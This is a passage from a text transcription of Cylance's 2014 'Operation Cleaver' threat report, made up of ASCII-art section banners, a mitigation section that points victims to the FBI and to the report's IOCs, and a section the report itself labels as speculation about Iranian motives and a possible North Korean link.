 2531. %%%%%%*%,@%%  ((#(###@@@@@@@&%/&@@@#  *   #   #.        .(         .#@@@%##@#%//  /%%/%/#%%&/@#%&
 2532. %%%%%%%%*%@#  %%%&@%@@@@%%%%&%&%&%%   (   %   (.   ,      (     (#&&%%%%%%%(*%#&/(  (////%%@@/((&@@
 2533. %%%%%%*.%*((  ##%%((@@######%&%%%   #   #    %   *(      / #%%%&@@@%%%%%%%%/####  *//@@@@@@//@@##
 2534. %%%%%%&&(/((  @@%%%#&@%#@@@@@@&   (   #   .*    .#     (@&%%@@@@@%%%%%%%%(%%%/  /%%%%@%@@%/###(
 2535. %%%%%%(&*(((  &@@@&%((((&@@@@@@@@,*   #  .%#((.  .#        &@@@@@@@@@@@%%%%%%%%%%%  %%%%%%%%%@/%@@@
 2536. %%%%@@/#@@*@  /@@@%@@#@@@@@@@@@  &@,        /         ,@@@@@@@@@@@@@%@@@/%%%%( .%%%%%%%%%%%%%%@
 2537. %%%@@@@, &@@(  &@@@@%@@@@@#(%&/(% (*          (.          (#/((@@@@@@@@%&&(%%%%. %#%%%%%%%@%%&@@@
 2538. %%@&@@@,@,@%@. ,@@@@%@@@@(((%&@#            .%          /#%%%%%%/&&&@@@@@@#(#&/  @(#%%%%#(#%%%%@@
 2539. %%%&%@@@,@&&@@  @@@@@#@@@&@@%            .%%%,        *# /#%#%##%(#@@@@@@@@%%,%%  (@##%%%%%%%#@
 2540. %%%%#@@@@**%/  @@@@%#@@@@@,          /.  *%       (/  #%%###%@@@(@@@@@@%(/(%(  ,%%%%%#%%%%%%%%%%%
 2541. %%%%%%%%%%%.%,@#  @@@@@&@@@@&       .(       #    (/   ###%%%##%%%@@@@&%/*/,/(  *%%#%#%%%%%@@%%%%%%
 2542. %%%&@@#@@%## (%%(  @@@@%@@@@@%   .(%    ###(,         %%%%%%%%%%%/%%%@%/*&&@&  ,%%%%#%%#%%%%%%%%@@%
 2543. %%%%%#@@%@@%,/@*%#  %@@@@%@@@@@@&@@@&%               %%%%%%%%%%%%%#%%%%(#%%/  ,%%%%%#@@@@@@@@@@@@@@
 2544. %@@&%%%%%%%%@@%,/((,  (##%#%&@@@@@@#(#              .%%%@%%%%%%%%%/#/%@@@%   %%%%%%@@@@@@@@@@@@@@@@
 2545. %##%%%%%%@@%#*#* (&%(   #%#*&@@@@@#@@@              .%%%%%#(((%%%%%####%   ###%%%%@@@@@&@@@@@@@@@@@
 2546. %%%%%%%%%@%(#@%@**(.(%%   (#((#**#@@@&              .#######/########(   *%%%@&%&&@@&@@@@&@@@@@@@@@
 2547. %%%%%%%%%###@@@@ .(.@#@@@   .#/(%@@@&&              .%####%########,   (%@#@#@@@@@%@@@%%@@@@@@@@@@@
 2548. #%%%%@@@@@@@@##((@,@*(,(/%%.   ,&/&%##              .###########,   .##&@%@@@@@@@%@@&@&@@@@@@&%%@@%
 2549. #@@@@@@@@@@(@@@@@@@%@.#,%.((%%#     ,(              .##%#%%*    .#%%%%%%#@@@%@@%@@@@@@@@@@@@@@@@@@@
 2550. @@@@@@((((((@@@@@@@@((#@/, (*(%%%%&.                         &%%%%%%%&@@%#@&@@@@@@@@&@@@@@@@@@@@@@@
 2551. @@@@@@%%@@(@@@@@@@(((%%%%%%%* %.%,%%%%               ##////%&/%&@@%@%@@%&%&@@@@&&&@&@@@@@@@@@@@@@@@
 2552. &@@(%@@@@@@@@@@@%@%%%%%((%%%%%/#,%%%%%              /////////@@@@@@@@@@@@@@@@@@@@@#%((@@@%@@@#@@@@@
 2553. ((((%#@@%@@%##@@#%((%(%((#/////////#&/         ./&%%&&&/@@@@@@@@@@@@@@@@@@@@&@@@@@@@@@@(%%#%%%%%%%%
 2554. (###%%%%%@@%@%%%#@@%###%#/////%//@@&(/     (   ./&%%%%&@@@@@@%&/@@((/@@@@@###%@%@@@@@#%@@@@@@#@@%%%
 2555. (%%%%%%%%%%%##@@@#%%%%&&&&&&@/@@@@@/@#.%&&(/   ,&/%%%%%%@@@@@///%%////(@%%%%%%%%@@@%%@@@@@@@@@@%%%%
 2556. #@@%%%%%%%%%%%%%%%@@@@@@@@@@@@@@@@@&%%%%%%%%   .%@//(////////////////////@&%@%@@/@###%%%%((((((%%((
 2557. %%%%%%%%%%%%%%%@@@@@@@@@@@@@@/@@@@#%%%%%%%%%   ,@@@@&%@@@%//%////%/%%%%/@#@@@@@/@//@@@/%%%%%(((((%@
 2558. %%%%%%%%%%(%@@@@#%#(#((((@@(%%%%%%%%%@#@@     (@@@@@@@%@#@&%%%@@@@@@@@%&@@@@@///@@@#%%%(#%%%(#%%%
 2559. #%%%####(%%%@@@@(%(%(((((((((##%%%%%@@@@@@#******%&%%&&%&@@@@@@@@@@@@@@@@%%&@@@@@@@%%@%%@%%%%%%(%((
 2560. (%((%@##@@@%%((%%((((((((#####(&%%#@%#%%@@%%% (##@%%%%%%%&@@@@@@@@@@@@@@@@@@@@%@@@&&@%@@@@@@@@%%@((
 2561. (((((%%%@@%#((#%%%%@((((((%%#(#%%%%%%(((%,       .%%%%%%@@@@@@@@@@@@@@@@@@@@@@%@@@@@@@@@@@@@@@@@@@@
 2562. (((#((((%((%%%@@#@@@((((((@@%(%(%%%@@%%((         *@@@%&@@@@@@@@@@#@@@#%@@@@@@@@@@@@@@@@@@@@@@@@@@@
 2563. ##((#(###(@@@@@@@@@@@@#((@@%%%%%%%%%%%%((         ,@@#@@@@@@@@@@@@%@@@&%%#@@@@@@@@@@@@@@@@@@@@@@@@@
 2564. %%%%%%%%%%#@@@%@@%@@@#(%%%(##%%#(##%%((((         ,@&@@@@@@@@@@@@@@@&&@%@@@@%%@@@@@@@@@@@@@@@@@@@@&
 2565. @@@@@@@@@@@&@@@@@%%&@%@(((%%%%%%((((((((%     ... ,@@@@@@@@@@@(#%%%%%%#%%%%%%@#@%%%%%((%@@@@@@@%%%%
 2566. @@@@@@@@@@@@@@@@@@#(@@@@@(%%%%%((((%%((((((      @@@@@&%&@@@#(#%%%%%%%%%%#@@@@#%%%%%%%%%%%%##@@@(%%
 2567. %@@&%@@%%%@@@@@@%@(((((@((((#((#(%%%%%%%%%(      @@@&%%%@@@@%%%%@@%%%%#&%%%@&%%%%%%%%%%%%%((%%%%%%%
 2568. //#(%%%%%@@@@%%(((((((((((((((((%(#%%%##(##..,,, @@@&%@@@%%@@@@@@@%%%%%%%%%%%%%%%%@%%%%%%%((%%@@@%@
 2569. /#((/#%#(%%@(((%(%%%%%((((((#(((%%%%#(((%//..*** @@@@@@@@@#%%@%%%%%%%%%%%%%%@#%%%%%%%((((((((((((((
 2570.  
 2571. [ PG-60 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 2572.  
 2573.  
 2574.  
 2575. [CYLANCE                                                                                  #OPCLEAVER]
 2576.  
 2577.  
 2578. MITIGATION
 2579.  
 2580. If after reviewing the Indicators of Compromise (IOC) listed in Appendix A, you believe your
 2581. organization to be a victim of Operation Cleaver, we recommend you consider the following course
 2582. of action:
 2583.  
 2584. 1.      If inside the United States, contact the Federal Bureau of Investigation (FBI)
 2585. via either your local FBI team or FBI CYWATCH at 1-855-292-3937 or cywatch@ic.fbi.gov.
 2586.  
 2587. 2.      If outside the United States, contact your local, district, state or federal law
 2588. enforcement authorities.
 2589.  
 2590. 3.      If you have visibility into the attacks on your company and the tools and expertise to track
 2591. them down, leverage the IOCs in Appendix A to identify their presence in your network, prevent them
 2592. from expanding the scope of the compromise, and remove their access immediately.
 2593.  
 2594. 4.      If you do NOT have visibility into the attacks, need help identifying an existing successful
 2595. compromise in your organization, or more importantly wish to prevent this attack or attacks similar
 2596. to Operation Cleaver, please contact your security provider.
 2597.  
 2598. 5.      If you wish to contact Cylance for additional details not available in this report, please email
 2599. opcleaver@cylance.com.
 2600.  
 2601.  
 2602. 6.      If you would like to learn more about Cylance products and professional services, or discuss
 2603. how Cylance can mitigate Operation Cleaver’s impact to your organization, please contact us directly.
 2604.  
 2605.  
 2606.  
 2607. +1 (877) 973 - 3336
 2608.  
 2609.  
 2610. opcleaver@cylance.com
 2611.  
 2612.  
 2613. www.cylance.com
 2614.  
 2615.  
 2616. [ PG-61 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 2617.  
 2618.  
 2619.  
 2620. [CYLANCE                                                                                  #OPCLEAVER]
 2621.  
 2622. @@@@@@@@@@@@@@@@@@@@@@@@###@@@@(((@@@@@@@@@@@%%#@@@@@@@%###%##%&@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%%
 2623. %#####%%#@@&%%@@@@#%%%%%%%%((%#&@@#%%@@@@@#%%%%@@@#@@@@@@@###%#@@@@@@/@&%%@@@@@@@@@@&@@@@@%#@@@%@@%
 2624. %#%%%%%%%%@@@%%%@@#%%%%%%%%            SPECULATION           @@%%%%%(((@@@@%##@#@@%&@%&@@@@%@@%%@@@
 2625. #%%%%%%@@@@@@@(/%%%%%%%%%(((%%%%@@@@#####@@&&%/,,@&*/@&@@@###@##%#@@@@@@@@@%%@@%%@@@@@@@##@@@@@@@@&
 2626. (%%%%#@@@@#%@@#%%%%%%%%%%%%(%%(/@@/@/#%/%((/#(@(@@.(,@((&@&(.%%%#@@@@@%@@@@@@@@@@@@@@%%(@@@####@@%%
 2627. #@@@@@@@@@/(((#%%%%%%%%%(%%%%%###%,%%,@%/(/#@/@.@@/*###,%(@/%*/(%@&@%@@@@@@@@@@@@@@%    %%%%%%%%%%%
 2628. @@@@@@@@@@@%%((&%%@#%#@@%&((,*(.%.%,#%%%%%/,,      .,(&%%#((#*.**(@#@@@@@@@@@@@@.        /########%
 2629. @#&(#&(###@###(///@&&(.%.&(%%#&,       .,**//**,.       .#######@@&@&&%             @@@@@&%@@
 2630. %%%%(%%%%%%%%&(((((((.%(( (.%%%.    *#%%%%%%%%%%%%%#%##*(((,    .#(%#(##(/                 @@@@%%#@
 2631. %%%%%%#####%/(#(((((.(.(,%%%    ,%%%%%%%%%#(*/*%%%###%###%%.,(#*    (&                     .&&&&&&&
 2632. (%%%%%%%%(((((%%%%,(((%   ,%%/%@@/#@@@(@@%%%##%%%##%%%%%%%%/%%##.                          %%%%%%
 2633. (((((((((%%#(((&%%%*%%%   ##//%#,.#@@&&@@@/#%%%%%%%%*#//**(                              ,%%%%@
 2634. #(#@(####((%((#@(%%%%   ##%%#(#//%&@%%#(/&@###*#%%%%%%%%#%#*                                  .%%##
 2635. %%@@@@@(((((%%#%.@@.  #%%&@&/@&&&%%%%##*%#(*(%%%%%%%%%%%.                                      *###
 2636. #(((((#%%%(##,@(%@  *@@#/((/*%/(%((&/(%##/#%%%%%%@@%&                                           (##
 2637. (#%%%%%%%@,/&%&@(  @&@@@@&%%/#%#/%///@%%%%%%%%@@&(                                        ,//*  /##
 2638. (####(#%%,.#%&@#  @@@@@@@&&@@&&#,&@&%%%%%#//%%%//                                             ///
 2639. ((((###(&((%*@/  %%%@@%%%%%%%/*/%%%%%%@@%%(/////////(                                        ((((((
 2640. ##%%%%#@#*.(#/   %%%%%%&@%%%%/,,%%%%&@@@@@@@@(#@@@@(//                               ,#%%@%%&//%%%%
 2641. ######%@. ,#%   (%%%%%%%%,(&@@@@@&@@@@@@@@@@@/#@    @(%/                        ,  %%%%#((((//////%
 2642. %%%%%%(%.#,%(  (%%///%%#/%%&@@@#@/&@@@@#  /,  ,#    #%(#(                  *(&*#,. %###/(///(//////
 2643. %%%%%%%%  %%  *(%/%%#/%@@&@@&@@@@%@@@@%   /    ..((,../*/              ,((@@@%/%#/ .///%/%(/%%@@@@@
 2644. %%%%%%*%,@%%  ((#(###@@@@@@@&%/&@@@#  *   #   #.        .(         .#@@@%##@#%//  /%%/%/#%%&/@#%&
 2645. %%%%%%%%*%@#  %%%&@%@@@@%%%%&%&%&%%   (   %   (.   ,      (     (#&&%%%%%%%(*%#&/(  (////%%@@/((&@@
 2646. %%%%%%*.%*((  ##%%((@@######%&%%%   #   #    %   *(      / #%%%&@@@%%%%%%%%/####  *//@@@@@@//@@##
 2647. %%%%%%&&(/((  @@%%%#&@%#@@@@@@&   (   #   .*    .#     (@&%%@@@@@%%%%%%%%(%%%/  /%%%%@%@@%/###(
 2648. %%%%%%(&*(((  &@@@&%((((&@@@@@@@@,*   #  .%#((.  .#        &@@@@@@@@@@@%%%%%%%%%%%  %%%%%%%%%@/%@@@
 2649. %%%%@@/#@@*@  /@@@%@@#@@@@@@@@@  &@,        /         ,@@@@@@@@@@@@@%@@@/%%%%( .%%%%%%%%%%%%%%@
 2650. %%%@@@@, &@@(  &@@@@%@@@@@#(%&/(% (*          (.          (#/((@@@@@@@@%&&(%%%%. %#%%%%%%%@%%&@@@
 2651. %%@&@@@,@,@%@. ,@@@@%@@@@(((%&@#            .%          /#%%%%%%/&&&@@@@@@#(#&/  @(#%%%%#(#%%%%@@
 2652. %%%&%@@@,@&&@@  @@@@@#@@@&@@%            .%%%,        *# /#%#%##%(#@@@@@@@@%%,%%  (@##%%%%%%%#@
 2653. %%%%#@@@@**%/  @@@@%#@@@@@,          /.  *%       (/  #%%###%@@@(@@@@@@%(/(%(  ,%%%%%#%%%%%%%%%%%
 2654. %%%%%%%%%%%.%,@#  @@@@@&@@@@&       .(       #    (/   ###%%%##%%%@@@@&%/*/,/(  *%%#%#%%%%%@@%%%%%%
 2655. %%%&@@#@@%## (%%(  @@@@%@@@@@%   .(%    ###(,         %%%%%%%%%%%/%%%@%/*&&@&  ,%%%%#%%#%%%%%%%%@@%
 2656. %%%%%#@@%@@%,/@*%#  %@@@@%@@@@@@&@@@&%               %%%%%%%%%%%%%#%%%%(#%%/  ,%%%%%#@@@@@@@@@@@@@@
 2657. %@@&%%%%%%%%@@%,/((,  (##%#%&@@@@@@#(#              .%%%@%%%%%%%%%/#/%@@@%   %%%%%%@@@@@@@@@@@@@@@@
 2658. %##%%%%%%@@%#*#* (&%(   #%#*&@@@@@#@@@              .%%%%%#(((%%%%%####%   ###%%%%@@@@@&@@@@@@@@@@@
 2659. %%%%%%%%%@%(#@%@**(.(%%   (#((#**#@@@&              .#######/########(   *%%%@&%&&@@&@@@@&@@@@@@@@@
 2660. %%%%%%%%%###@@@@ .(.@#@@@   .#/(%@@@&&              .%####%########,   (%@#@#@@@@@%@@@%%@@@@@@@@@@@
 2661. #%%%%@@@@@@@@##((@,@*(,(/%%.   ,&/&%##              .###########,   .##&@%@@@@@@@%@@&@&@@@@@@&%%@@%
 2662. #@@@@@@@@@@(@@@@@@@%@.#,%.((%%#     ,(              .##%#%%*    .#%%%%%%#@@@%@@%@@@@@@@@@@@@@@@@@@@
 2663. @@@@@@((((((@@@@@@@@((#@/, (*(%%%%&.                         &%%%%%%%&@@%#@&@@@@@@@@&@@@@@@@@@@@@@@
 2664. @@@@@@%%@@(@@@@@@@(((%%%%%%%* %.%,%%%%               ##////%&/%&@@%@%@@%&%&@@@@&&&@&@@@@@@@@@@@@@@@
 2665. &@@(%@@@@@@@@@@@%@%%%%%((%%%%%/#,%%%%%              /////////@@@@@@@@@@@@@@@@@@@@@#%((@@@%@@@#@@@@@
 2666. ((((%#@@%@@%##@@#%((%(%((#/////////#&/         ./&%%&&&/@@@@@@@@@@@@@@@@@@@@&@@@@@@@@@@(%%#%%%%%%%%
 2667. (###%%%%%@@%@%%%#@@%###%#/////%//@@&(/     (   ./&%%%%&@@@@@@%&/@@((/@@@@@###%@%@@@@@#%@@@@@@#@@%%%
 2668. (%%%%%%%%%%%##@@@#%%%%&&&&&&@/@@@@@/@#.%&&(/   ,&/%%%%%%@@@@@///%%////(@%%%%%%%%@@@%%@@@@@@@@@@%%%%
 2669. #@@%%%%%%%%%%%%%%%@@@@@@@@@@@@@@@@@&%%%%%%%%   .%@//(////////////////////@&%@%@@/@###%%%%((((((%%((
 2670. %%%%%%%%%%%%%%%@@@@@@@@@@@@@@/@@@@#%%%%%%%%%   ,@@@@&%@@@%//%////%/%%%%/@#@@@@@/@//@@@/%%%%%(((((%@
 2671. %%%%%%%%%%(%@@@@#%#(#((((@@(%%%%%%%%%@#@@     (@@@@@@@%@#@&%%%@@@@@@@@%&@@@@@///@@@#%%%(#%%%(#%%%
 2672. #%%%####(%%%@@@@(%(%(((((((((##%%%%%@@@@@@#******%&%%&&%&@@@@@@@@@@@@@@@@%%&@@@@@@@%%@%%@%%%%%%(%((
 2673. (%((%@##@@@%%((%%((((((((#####(&%%#@%#%%@@%%% (##@%%%%%%%&@@@@@@@@@@@@@@@@@@@@%@@@&&@%@@@@@@@@%%@((
 2674. (((((%%%@@%#((#%%%%@((((((%%#(#%%%%%%(((%,       .%%%%%%@@@@@@@@@@@@@@@@@@@@@@%@@@@@@@@@@@@@@@@@@@@
 2675. (((#((((%((%%%@@#@@@((((((@@%(%(%%%@@%%((         *@@@%&@@@@@@@@@@#@@@#%@@@@@@@@@@@@@@@@@@@@@@@@@@@
 2676. ##((#(###(@@@@@@@@@@@@#((@@%%%%%%%%%%%%((         ,@@#@@@@@@@@@@@@%@@@&%%#@@@@@@@@@@@@@@@@@@@@@@@@@
 2677. %%%%%%%%%%#@@@%@@%@@@#(%%%(##%%#(##%%((((         ,@&@@@@@@@@@@@@@@@&&@%@@@@%%@@@@@@@@@@@@@@@@@@@@&
 2678. @@@@@@@@@@@&@@@@@%%&@%@(((%%%%%%((((((((%     ... ,@@@@@@@@@@@(#%%%%%%#%%%%%%@#@%%%%%((%@@@@@@@%%%%
 2679. @@@@@@@@@@@@@@@@@@#(@@@@@(%%%%%((((%%((((((      @@@@@&%&@@@#(#%%%%%%%%%%#@@@@#%%%%%%%%%%%%##@@@(%%
 2680. %@@&%@@%%%@@@@@@%@(((((@((((#((#(%%%%%%%%%(      @@@&%%%@@@@%%%%@@%%%%#&%%%@&%%%%%%%%%%%%%((%%%%%%%
 2681. //#(%%%%%@@@@%%(((((((((((((((((%(#%%%##(##..,,, @@@&%@@@%%@@@@@@@%%%%%%%%%%%%%%%%@%%%%%%%((%%@@@%@
 2682. /#((/#%#(%%@(((%(%%%%%((((((#(((%%%%#(((%//..*** @@@@@@@@@#%%@%%%%%%%%%%%%%%@#%%%%%%%((((((((((((((
 2683.  
 2684. [ PG-62 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 2685.  
 2686.  
 2687.  
 2688. [CYLANCE                                                                                  #OPCLEAVER]
 2689.  
 2690.  
 2691. SPECULATION: THE WHY
 2692.  
 2693. Iran in 2014 can probably be best described as galvanizing. They have long been an “enemy” of  
 2694. the west, and the United States in particular, but today’s headlines include a variety of topics
 2695. from nuclear talks to human rights to terrorism to cyber hacking. Iran continues to be extremely
 2696. active on the global stage – and thereby on the radar of every superpower.10
 2697.  
 2698. Iran’s cyber sophistication has grown rapidly since the dawn of Stuxnet and they have used hard
 2699. dollars combined with national pride to help build their cyber army. Few doubt their commitment as
 2700. a government and nation state to funding and recruiting cyber warriors to infiltrate and damage their
 2701. enemies. And it has been commonly postulated that almost all activity since 2010 coming out of Iran
 2702. is associated with retaliation for Stuxnet/Duqu/Flame, which seems natural given the severity of the
 2703. impact. But they don’t need Stuxnet as motivation to want to hack the world. They have long desired
 2704. power on the political stage, in particular in the fight for nuclear power autonomy.
 2705.  
 2706. With the deadlines around the Iranian nuclear discussions pushed to 2015, the attacks may be tied to
 2707. negotiating power when discussing a pact with the nuclear superpowers of United States, Britain,
 2708. France, Germany, Russia and China.
 2709.  
 2710. The inner workings of the Iranian government remain largely a mystery to the western world. However,
 2711. Iran’s control over its people and the private businesses birthed inside has been well reported.
 2712. In a 2014 Reuters article, the reporters detail how the secret Iranian organization called
 2713. “Setad Ejraiye Farmane Hazrate Emam” has become one of the most powerful organizations in the country,
 2714. capable of taking over properties and businesses, buying controlling interests in numerous sectors
 2715. including finance, oil, telecommunications and many others totaling in upwards of $95B.11 Even the US
 2716. Treasury has documented an extensive fronting of companies in its report of Execution of Imam
 2717. Khomeini’s Order (EIKO), which through its two main subsidiaries controls 37 private businesses that
 2718. are purely front companies for the Iranian government.12
 2719.  
 2720. The history of Iran controlling the usage of the Internet and the very Internet on-ramps into Iran is
 2721. well known13, 14. They have controlled much of the country’s Internet access to date and have taken
 2722. over controlling interests in those companies to carry out their work. Given Operation Cleaver’s
 2723. frequent spin-up and take-down of large IP blocks inside the AFRANET IP space inside Iran,
 2724. and Iran’s well recorded investment in cyber warfare14 leads us to one simple conclusion: Iran is
 2725. extremely active in the world of hacking.
 2726.  
 2727. [ PG-63 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 2728.  
 2729.  
 2730.  
 2731. [CYLANCE                                                                                  #OPCLEAVER]
 2732.  
 2733.  
 2734. Speculation: The Why (cont.)
 2735.  
 2736. Involvement with North Korea
 2737.  
 2738. Operation Cleaver’s intense focus on critical infrastructure companies, especially in South Korea,
 2739. hints at information sharing or joint operations with Iran’s partner, North Korea. In September, 2012,
 2740. Iran signed an extensive agreement for technology cooperation agreement with North Korea, which allows
 2741. for collaboration on a variety of efforts including IT and security.6
 2742.  
 2743. Cyber Moving to Physical
 2744.  
 2745. Operation Cleaver’s carefully selected targets like the oil and gas industry, energy and utility
 2746. companies, as well as airlines and airports, indicates Iran’s desire to gain deep access into the
 2747. world’s most critical environments. The end goal of this operation is not known at this time.
 2748.  
 2749. University Recruitment
 2750.  
 2751. University student recruitment was hinted at within Operation Cleaver and is consistent with Iran’s
 2752. reported history of active warrior recruitment in the educational space.15
 2753.  
 2754. Overall, there are many reasons that Iran may be pursuing the targets they did in Operation Cleaver.
 2755. While we may never truly know, it is important to consider all the above and more when trying to
 2756. understand the why.
 2757.  
 2758. [ PG-64 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 2759.  
 2760.  
 2761.  
 2762. [CYLANCE                                                                                  #OPCLEAVER]
 2763.  
 2764. @@@@@@@@@@@@@@@@@@@@@@@@###@@@@(((@@@@@@@@@@@%%#@@@@@@@%###%##%&@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%%
 2765. %#####%%#@@&%%@@@@#%%%%%%%%((%#&@@#%%@@@@@#%%%%@@@#@@@@@@@###%#@@@@@@/@&%%@@@@@@@@@@&@@@@@%#@@@%@@%
 2766. %#%%%%%%%%@@@%%%@@#%%%%%%%%            CONCLUSION           @@%%%%%(((@@@@%##@#@@%&@%&@@@@%@@%%@@@
 2767. #%%%%%%@@@@@@@(/%%%%%%%%%(((%%%%@@@@#####@@&&%/,,@&*/@&@@@###@##%#@@@@@@@@@%%@@%%@@@@@@@##@@@@@@@@&
 2768. (%%%%#@@@@#%@@#%%%%%%%%%%%%(%%(/@@/@/#%/%((/#(@(@@.(,@((&@&(.%%%#@@@@@%@@@@@@@@@@@@@@%%(@@@####@@%%
 2769. #@@@@@@@@@/(((#%%%%%%%%%(%%%%%###%,%%,@%/(/#@/@.@@/*###,%(@/%*/(%@&@%@@@@@@@@@@@@@@%    %%%%%%%%%%%
 2770. @@@@@@@@@@@%%((&%%@#%#@@%&((,*(.%.%,#%%%%%/,,      .,(&%%#((#*.**(@#@@@@@@@@@@@@.        /########%
 2771. @#&(#&(###@###(///@&&(.%.&(%%#&,       .,**//**,.       .#######@@&@&&%             @@@@@&%@@
 2772. %%%%(%%%%%%%%&(((((((.%(( (.%%%.    *#%%%%%%%%%%%%%#%##*(((,    .#(%#(##(/                 @@@@%%#@
 2773. %%%%%%#####%/(#(((((.(.(,%%%    ,%%%%%%%%%#(*/*%%%###%###%%.,(#*    (&                     .&&&&&&&
 2774. (%%%%%%%%(((((%%%%,(((%   ,%%/%@@/#@@@(@@%%%##%%%##%%%%%%%%/%%##.                          %%%%%%
 2775. (((((((((%%#(((&%%%*%%%   ##//%#,.#@@&&@@@/#%%%%%%%%*#//**(                              ,%%%%@
 2776. #(#@(####((%((#@(%%%%   ##%%#(#//%&@%%#(/&@###*#%%%%%%%%#%#*                                  .%%##
 2777. %%@@@@@(((((%%#%.@@.  #%%&@&/@&&&%%%%##*%#(*(%%%%%%%%%%%.                                      *###
 2778. #(((((#%%%(##,@(%@  *@@#/((/*%/(%((&/(%##/#%%%%%%@@%&                                           (##
 2779. (#%%%%%%%@,/&%&@(  @&@@@@&%%/#%#/%///@%%%%%%%%@@&(                                        ,//*  /##
 2780. (####(#%%,.#%&@#  @@@@@@@&&@@&&#,&@&%%%%%#//%%%//                                             ///
 2781. ((((###(&((%*@/  %%%@@%%%%%%%/*/%%%%%%@@%%(/////////(                                        ((((((
 2782. ##%%%%#@#*.(#/   %%%%%%&@%%%%/,,%%%%&@@@@@@@@(#@@@@(//                               ,#%%@%%&//%%%%
 2783. ######%@. ,#%   (%%%%%%%%,(&@@@@@&@@@@@@@@@@@/#@    @(%/                        ,  %%%%#((((//////%
 2784. %%%%%%(%.#,%(  (%%///%%#/%%&@@@#@/&@@@@#  /,  ,#    #%(#(                  *(&*#,. %###/(///(//////
 2785. %%%%%%%%  %%  *(%/%%#/%@@&@@&@@@@%@@@@%   /    ..((,../*/              ,((@@@%/%#/ .///%/%(/%%@@@@@
 2786. %%%%%%*%,@%%  ((#(###@@@@@@@&%/&@@@#  *   #   #.        .(         .#@@@%##@#%//  /%%/%/#%%&/@#%&
 2787. %%%%%%%%*%@#  %%%&@%@@@@%%%%&%&%&%%   (   %   (.   ,      (     (#&&%%%%%%%(*%#&/(  (////%%@@/((&@@
 2788. %%%%%%*.%*((  ##%%((@@######%&%%%   #   #    %   *(      / #%%%&@@@%%%%%%%%/####  *//@@@@@@//@@##
 2789. %%%%%%&&(/((  @@%%%#&@%#@@@@@@&   (   #   .*    .#     (@&%%@@@@@%%%%%%%%(%%%/  /%%%%@%@@%/###(
 2790. %%%%%%(&*(((  &@@@&%((((&@@@@@@@@,*   #  .%#((.  .#        &@@@@@@@@@@@%%%%%%%%%%%  %%%%%%%%%@/%@@@
 2791. %%%%@@/#@@*@  /@@@%@@#@@@@@@@@@  &@,        /         ,@@@@@@@@@@@@@%@@@/%%%%( .%%%%%%%%%%%%%%@
 2792. %%%@@@@, &@@(  &@@@@%@@@@@#(%&/(% (*          (.          (#/((@@@@@@@@%&&(%%%%. %#%%%%%%%@%%&@@@
 2793. %%@&@@@,@,@%@. ,@@@@%@@@@(((%&@#            .%          /#%%%%%%/&&&@@@@@@#(#&/  @(#%%%%#(#%%%%@@
 2794. %%%&%@@@,@&&@@  @@@@@#@@@&@@%            .%%%,        *# /#%#%##%(#@@@@@@@@%%,%%  (@##%%%%%%%#@
 2795. %%%%#@@@@**%/  @@@@%#@@@@@,          /.  *%       (/  #%%###%@@@(@@@@@@%(/(%(  ,%%%%%#%%%%%%%%%%%
 2796. %%%%%%%%%%%.%,@#  @@@@@&@@@@&       .(       #    (/   ###%%%##%%%@@@@&%/*/,/(  *%%#%#%%%%%@@%%%%%%
 2797. %%%&@@#@@%## (%%(  @@@@%@@@@@%   .(%    ###(,         %%%%%%%%%%%/%%%@%/*&&@&  ,%%%%#%%#%%%%%%%%@@%
 2798. %%%%%#@@%@@%,/@*%#  %@@@@%@@@@@@&@@@&%               %%%%%%%%%%%%%#%%%%(#%%/  ,%%%%%#@@@@@@@@@@@@@@
 2799. %@@&%%%%%%%%@@%,/((,  (##%#%&@@@@@@#(#              .%%%@%%%%%%%%%/#/%@@@%   %%%%%%@@@@@@@@@@@@@@@@
 2800. %##%%%%%%@@%#*#* (&%(   #%#*&@@@@@#@@@              .%%%%%#(((%%%%%####%   ###%%%%@@@@@&@@@@@@@@@@@
 2801. %%%%%%%%%@%(#@%@**(.(%%   (#((#**#@@@&              .#######/########(   *%%%@&%&&@@&@@@@&@@@@@@@@@
 2802. %%%%%%%%%###@@@@ .(.@#@@@   .#/(%@@@&&              .%####%########,   (%@#@#@@@@@%@@@%%@@@@@@@@@@@
 2803. #%%%%@@@@@@@@##((@,@*(,(/%%.   ,&/&%##              .###########,   .##&@%@@@@@@@%@@&@&@@@@@@&%%@@%
 2804. #@@@@@@@@@@(@@@@@@@%@.#,%.((%%#     ,(              .##%#%%*    .#%%%%%%#@@@%@@%@@@@@@@@@@@@@@@@@@@
 2805. @@@@@@((((((@@@@@@@@((#@/, (*(%%%%&.                         &%%%%%%%&@@%#@&@@@@@@@@&@@@@@@@@@@@@@@
 2806. @@@@@@%%@@(@@@@@@@(((%%%%%%%* %.%,%%%%               ##////%&/%&@@%@%@@%&%&@@@@&&&@&@@@@@@@@@@@@@@@
 2807. &@@(%@@@@@@@@@@@%@%%%%%((%%%%%/#,%%%%%              /////////@@@@@@@@@@@@@@@@@@@@@#%((@@@%@@@#@@@@@
 2808. ((((%#@@%@@%##@@#%((%(%((#/////////#&/         ./&%%&&&/@@@@@@@@@@@@@@@@@@@@&@@@@@@@@@@(%%#%%%%%%%%
 2809. (###%%%%%@@%@%%%#@@%###%#/////%//@@&(/     (   ./&%%%%&@@@@@@%&/@@((/@@@@@###%@%@@@@@#%@@@@@@#@@%%%
 2810. (%%%%%%%%%%%##@@@#%%%%&&&&&&@/@@@@@/@#.%&&(/   ,&/%%%%%%@@@@@///%%////(@%%%%%%%%@@@%%@@@@@@@@@@%%%%
 2811. #@@%%%%%%%%%%%%%%%@@@@@@@@@@@@@@@@@&%%%%%%%%   .%@//(////////////////////@&%@%@@/@###%%%%((((((%%((
 2812. %%%%%%%%%%%%%%%@@@@@@@@@@@@@@/@@@@#%%%%%%%%%   ,@@@@&%@@@%//%////%/%%%%/@#@@@@@/@//@@@/%%%%%(((((%@
 2813. %%%%%%%%%%(%@@@@#%#(#((((@@(%%%%%%%%%@#@@     (@@@@@@@%@#@&%%%@@@@@@@@%&@@@@@///@@@#%%%(#%%%(#%%%
